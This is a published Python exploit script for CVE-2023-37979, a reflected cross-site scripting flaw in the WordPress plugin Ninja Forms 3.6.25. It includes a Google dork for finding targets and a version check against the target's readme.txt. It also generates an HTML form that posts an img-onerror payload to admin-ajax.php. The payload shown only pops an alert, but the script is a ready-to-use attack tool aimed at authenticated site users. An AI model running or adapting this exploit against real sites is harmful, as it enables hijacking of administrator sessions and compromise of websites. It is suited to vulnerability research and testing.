# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979
from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep
# Values:
url = argv[-1]
if url[-1] == "/":
url = url.rstrip("/")
# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"
# HTML template
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
<title>{CVE_NAME}</title>
<style>
body {{
font-family: Arial, sans-serif;
background-color: #f7f7f7;
color: #333;
margin: 0;
padding: 0;
}}
header {{
background-color: #4CAF50;
padding: 10px;
text-align: center;
color: white;
font-size: 24px;
}}
.cool-button {{
background-color: #007bff;
color: white;
padding: 10px 20px;
border: none;
cursor: pointer;
font-size: 16px;
border-radius: 4px;
}}
.cool-button:hover {{
background-color: #0056b3;
}}
</style>
</head>
<body>
<header>
Ninja-forms reflected XSS ({CVE_NAME})</br>
Created by Mehran Seifalinia
</header>
<div style="padding: 20px;">
<form action="{url}/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="nf_batch_process" />
<input type="hidden" name="batch_type" value="import_form_template" />
<input type="hidden" name="security" value="e29f2d8dca" />
<input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />
<input type="hidden" name="method_override" value="_respond" />
<input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />
<input type="submit" class="cool-button" value="Click here to Execute XSS" />
</form>
</div>
<div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
<footer>
<a href="https://github.com/Mehran-Seifalinia">Github</a>
</br>
<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
</footer>
</body>
</html>
"""
def exploit():
with open(f"{CVE_NAME}.html", "w") as poc:
poc.write(HTML_TEMPLATE)
print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
sleep(2)
webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")
# Check if the vulnerable version is installed
def check_CVE():
try:
response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
if response.status_code != 200 or not("Ninja Forms" in response.text):
print("[!] Ninja-forms plugin has not installed on this site.")
return False
else:
version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
main_version = int(version.split(".")[0])
partial_version = int(version.split(".")[1])
final_version = int(version.split(".")[2])
if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
print(f"[*] Vulnerable Nonja-forms version {version} detected!")
return True
else:
print(f"[!] Nonja-forms version {version} is not vulnerable!")
return False
except Exception as error:
print(f"[!] Error: {error}")
exit()
# Check syntax of the script
def check_script():
usage = f"""
Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]
OPTIONS:
--exploit: Open a browser and execute the vulnerability.
TARGET:
An URL starts with 'http://' or 'https://'
Examples:
> {argv[0].split("/")[-1]} https://vulnsite.com
> {argv[0].split("/")[-1]} --exploit https://vulnsite.com
"""
try:
if len(argv) < 2 or len(argv) > 3:
print("[!] Syntax error...")
print(usage)
exit()
elif not url.startswith(tuple(["http://", "https://"])):
print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
exit()
else:
for arg in argv:
if arg == argv[0]:
print("[*]Starting the script >>>")
state = check_CVE()
if state == False:
exit()
elif arg.lower() == "--exploit":
exploit()
elif arg == url:
continue
else:
print(f"[!] What the heck is '{arg}' in the command?")
except Exception as error:
print(f"[!] Error: {error}")
exit()
if __name__ == "__main__":
check_script()